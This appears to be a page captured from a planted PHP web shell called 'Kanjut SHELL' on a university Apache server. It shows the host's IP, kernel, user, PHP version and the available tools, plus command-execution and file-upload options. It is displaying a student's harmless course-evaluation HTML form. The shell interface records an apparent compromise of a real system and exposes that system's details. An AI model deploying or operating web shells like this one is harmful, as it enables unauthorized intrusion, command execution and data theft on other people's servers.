Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.143.241.253
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jmmowatt/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jmmowatt/www/evalForm.html
<!-- 
	evalForm.html
	Jack Mowatt
	CS389
	Dr. Wang
	Goal: to receive values from the user to be inserted in the table EVAL
-->

<CENTER>
<h2>
Form for Inserting a Record
</h2>
<hr>
<Font color=blue size=4>
<Form action=eval.php method=post>
Student Status: <input type=radio name="status" value="Freshman"> Freshman
<input type=radio name="status" value="Sophomore"> Sophomore
<input type=radio name="status" value="Junior"> Junior
<input type=radio name="status" value="Senior"> Senior
<P>
Course Number: <input type=text size=5 name=course> <P>
Evaluation: <input type=radio name="pag" value=0> Poor
<input type=radio name="pag" value=1> Average
<input type=radio name="pag" value=2> Good
<P>
<HR>
<input type=submit value=Submit>
<input type=reset value=Reset>
<P><HR>
<A HREF=assgn4.html> Go Back|</A>
<A HREF=displayEval.php>View Table</A>
</Form>
</CENTER>

Stv3n404 - 2023